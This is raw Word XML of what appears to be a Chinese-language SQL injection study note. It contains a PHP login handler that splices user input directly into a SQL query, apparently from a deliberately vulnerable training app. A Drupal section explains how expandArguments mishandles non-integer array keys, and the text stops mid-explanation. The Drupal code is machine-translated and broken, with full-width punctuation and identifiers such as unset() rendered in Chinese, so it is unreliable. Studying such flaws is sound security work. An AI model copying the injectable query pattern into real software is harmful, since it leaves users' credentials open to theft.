    <w:p w14:paraId="05684973" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">    if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($_POST["form"]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD685B7" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD47528" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $login = $_POST["login"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9F3170" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $login = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($login);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F38481C" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="2D3363BE" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $password = $_POST["password"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27863662" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $password = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E11694" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $password = hash("sha1", $password, false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C28D1" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="6926E032" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "SELECT * FROM users WHERE login = ‘" . $login . "‘";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1373CB30" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="5C46AEED" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        // echo $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB1A6AC" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="2053CF88" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recordset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql_query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, $link);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4D4CFA" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="128EF1FB" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        if(!$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recordset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E5F7E3" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616380CD" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            die("Error: " . </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql_error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4151214C" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60773EDE" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B3B7D1" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9FBFB7" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            $row = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql_fetch_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recordset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318AB3D0" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="3120EE5B" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            if($row["login"] &amp;&amp; $password == $row["password"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5764F0F3" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567C7697" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">                // $message = "&lt;font color=\"green\"&gt;Welcome " . </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ucwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($row["login"]) . "...&lt;/font&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDE504D" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">                $message =  "&lt;p&gt;Welcome &lt;b&gt;" . </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ucwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">($row["login"]) . "&lt;/b&gt;, how are you today?&lt;/p&gt;&lt;p&gt;Your secret: &lt;b&gt;" . </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ucwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($row["secret"]) .    "&lt;/b&gt;&lt;/p&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBB84D3" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">                // $message = $row["login"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE34707" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C28B01D" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF8F07A" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2E24AD" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">                $message = "&lt;font color=\"red\"&gt;Invalid credentials!&lt;/font&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7141EF11" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097D4070" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251DB379" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql_close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($link);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7AF7EE" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B865089" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">    echo $message;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC60F9" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB11C0D" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="3D293AB9" w14:textId="77777777" w:rsidR="00E7491F" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B30E09" w14:textId="14765D31" w:rsidR="00227106" w:rsidRDefault="00227106" w:rsidP="00227106"/>
    <w:p w14:paraId="1BE1D674" w14:textId="77777777" w:rsidR="00FC0C36" w:rsidRPr="00227106" w:rsidRDefault="00FC0C36" w:rsidP="00227106"/>
    <w:p w14:paraId="315C06A8" w14:textId="1D2E3003" w:rsidR="00E7491F" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Drupal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF4942C" w14:textId="59E59B08" w:rsidR="00227106" w:rsidRDefault="00242270" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58795E4B" wp14:editId="500EA92D">
            <wp:extent cx="5274310" cy="2791460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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791460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1153C6" w14:textId="7A7FB12C" w:rsidR="00242270" w:rsidRDefault="00242270" w:rsidP="00227106"/>
    <w:p w14:paraId="0FBCEB42" w14:textId="5D9A09A2" w:rsidR="00C83A83" w:rsidRDefault="00C83A83" w:rsidP="00227106"/>
    <w:p w14:paraId="4252796E" w14:textId="5DBE74C4" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>Drupal在其所有SQL查询中使用预准备语句。处理IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句有一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>expandArguments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>函数来扩展数组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71095B82" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91"/>
    <w:p w14:paraId="0F086F4F" w14:textId="44EE6CA8" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t xml:space="preserve">protected function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>expandArguments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>（＆$ query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">＆$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A2DE86" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>$ modified = FALSE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703F96B0" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91"/>
    <w:p w14:paraId="5284E03D" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//如果要插入的占位符值是数组，则假设我们需要</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B5934" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//将其展开为逗号分隔的占位符集。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B9FFF3" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>foreach（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>array_filter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">（$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'）as $ key =&gt; $ data）{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529CE1DF" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>new_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = array（）;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6792049F" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t xml:space="preserve">foreach（$ data as $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> =&gt; $ value）{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C83514" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//这假设没有其他占位符使用相同的占位符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A940FF" w14:textId="6E927A43" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//名称。例如，如果数组占位符定义为：example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262F2C5D" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//并且已经存在：example_2占位符，这将生成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5A853" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//一个重复的密钥。我们不会将其视为主叫代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD76F5E" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//如果发生这种情况已经破裂了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D81C53" w14:textId="5601CC66" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>new_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [$ key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>'_'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] = $ value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C37851" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EB7EF0" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91"/>
    <w:p w14:paraId="257189EB" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//使用新占位符更新查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC4AFDA" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>preg_replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>是确保替换不受影响的必要条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079AE982" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//以相同的文本开头的占位符。例如，如果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFCD340" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>// query包含占位符：foo和：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>foobar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，以及：foo有一个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4132D6" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str_replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的值数组会影响两个占位符，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62482DDB" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//但是使用以下</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>preg_replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>只会影响：foo因为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06141CE7" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//后跟一个非单词字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA58470" w14:textId="4B68759D" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t xml:space="preserve">$ query = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>preg_replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>（'＃'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>$ key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>'\ b＃'，implode（'，'，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>array_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">（$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>new_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）），$ query）;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D69136" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRPr="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91"/>
    <w:p w14:paraId="368D73E6" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//使用新占位符更新</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA409A1" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未设置（的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [$键]）;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD9C8CA" w14:textId="2B9BB903" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + = $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>new_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F8C57F" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>$ modified = TRUE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C718A39" w14:textId="3EF08143" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD052EB" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>return $ modified;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D48E35" w14:textId="0A53765D" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19973FA6" w14:textId="7949411A" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该函数假定使用没有键的数组调用它。例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520598DD" w14:textId="1015817C" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db_query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>（“SELECT * FROM {users} where name IN（：name）”，array（'：name'=&gt; array（'user1'，'user2'）））;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406FC7EC" w14:textId="241519E9" w:rsidR="00A81A91" w:rsidRPr="00CD15B5" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这导致了这个</w:t>
      </w:r>
      <w:r>
        <w:t>SQL语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2BB6D3" w14:textId="588FCB65" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>SELECT *来自名称为IN（：name_0，：name_1）的用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F8A97" w14:textId="1F7AD409" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:t>name_0 = user1和name_1 = user2。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BE36CF" w14:textId="462517CA" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果数组具有不是整数的键，则会出现问题。例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB8991" w14:textId="6865EE54" w:rsidR="00A81A91" w:rsidRPr="00CD15B5" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db_query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>（“SELECT * FROM {users} where name IN（：name）”，array（'：name'=&gt; array</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>（'test  - '=&gt;'user1'，'test'=&gt;'user2'））） ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055D84DF" w14:textId="7DA7978F" w:rsidR="00A81A91" w:rsidRPr="00CD15B5" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
